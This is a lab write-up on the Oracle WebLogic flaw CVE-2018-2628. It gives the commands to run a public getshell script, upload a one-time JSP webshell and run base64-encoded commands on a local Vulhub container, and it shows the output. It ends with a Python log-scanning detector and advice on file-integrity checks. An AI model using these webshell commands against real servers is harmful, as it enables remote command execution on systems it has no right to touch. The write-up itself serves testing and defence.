WebLogic — CVE-2018-2628
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components).
Affected versions: 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3.
PoC
This vulnerability can be exploited using jas502n's script CVE-2018-2628-Getshell.py. A working webshell (to be uploaded) can be found in the referenced repository, though it is large and will be compiled to a smaller shell upon deployment.
Note that the shell is one-time-use only, meaning it will be removed once you execute a command.
Test Environment
Tested on Vulhub's weblogic:10.3.6.0-2017 container:
docker container ls
CONTAINER ID   IMAGE                           COMMAND              CREATED       STATUS
f3b474a990a1   vulhub/weblogic:10.3.6.0-2017   "startWebLogic.sh"   5 hours ago   Up 5 hours
Usage Example
Upload shell:
python2.7 CVE-2018-2628-Getshell.py 127.0.0.1 7003 shell1.jsp
Output:
>>>Shell File Upload Dir: servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\shell1.jsp
>>>Getshell: http://127.0.0.1:7003/bea_wls_internal/shell1.jsp?tom=d2hvYW1pCg==
Execute command (hostname example):
curl http://127.0.0.1:7003/bea_wls_internal/shell1.jsp\?tom\=aG9zdG5hbWU\=
Output:
->|vuln-weblogic
|<-%
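Detection
The requests shown above leave a recognisable pattern in the server's access log: a JSP directly under /bea_wls_internal/ called with a base64-encoded query parameter. The following Python 3 script is an added example, not part of the PoC repository; the common-log-format input, the sample lines and the function names are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (common log format), not real traffic.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /bea_wls_internal/shell1.jsp?tom=d2hvYW1pCg== HTTP/1.1" 200 12
127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /bea_wls_internal/shell1.jsp?tom=aG9zdG5hbWU= HTTP/1.1" 200 20
10.0.0.5 - - [01/Jan/2024:10:01:00 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3100
10.0.0.5 - - [01/Jan/2024:10:02:00 +0000] "GET /bea_wls_internal/status.jsp?page=2 HTTP/1.1" 404 0
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
# Assumption: any JSP sitting directly in this internal webapp is worth a look.
JSP_PATH_RE = re.compile(r"^/bea_wls_internal/[^/]+\.jsp$", re.IGNORECASE)


def decode_b64_text(value):
    """Return the decoded text if value is base64 of printable ASCII, else None."""
    try:
        text = base64.b64decode(value, validate=True).decode("ascii").strip()
    except (binascii.Error, ValueError):
        return None
    return text if text and text.isprintable() else None


def find_webshell_requests(log_text):
    """Return (client, path, param, decoded, status) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        if not (m := REQUEST_RE.match(line)):
            continue
        client, target, status = m.groups()
        parts = urlsplit(target)
        if not JSP_PATH_RE.match(parts.path):
            continue
        # Split by hand: parse_qsl would turn a base64 '+' into a space.
        for pair in parts.query.split("&"):
            name, _, value = pair.partition("=")
            decoded = decode_b64_text(unquote(value))
            if decoded:
                hits.append((client, parts.path, name, decoded, int(status)))
    return hits


if __name__ == "__main__":
    for hit in find_webshell_requests(SAMPLE_LOG):
        print(hit)
```

Because the shell removes itself after one command, the access log and the decoded parameter may be the only remaining trace; a file-integrity check on the servers\AdminServer\tmp\_WL_internal\bea_wls_internal directory complements this.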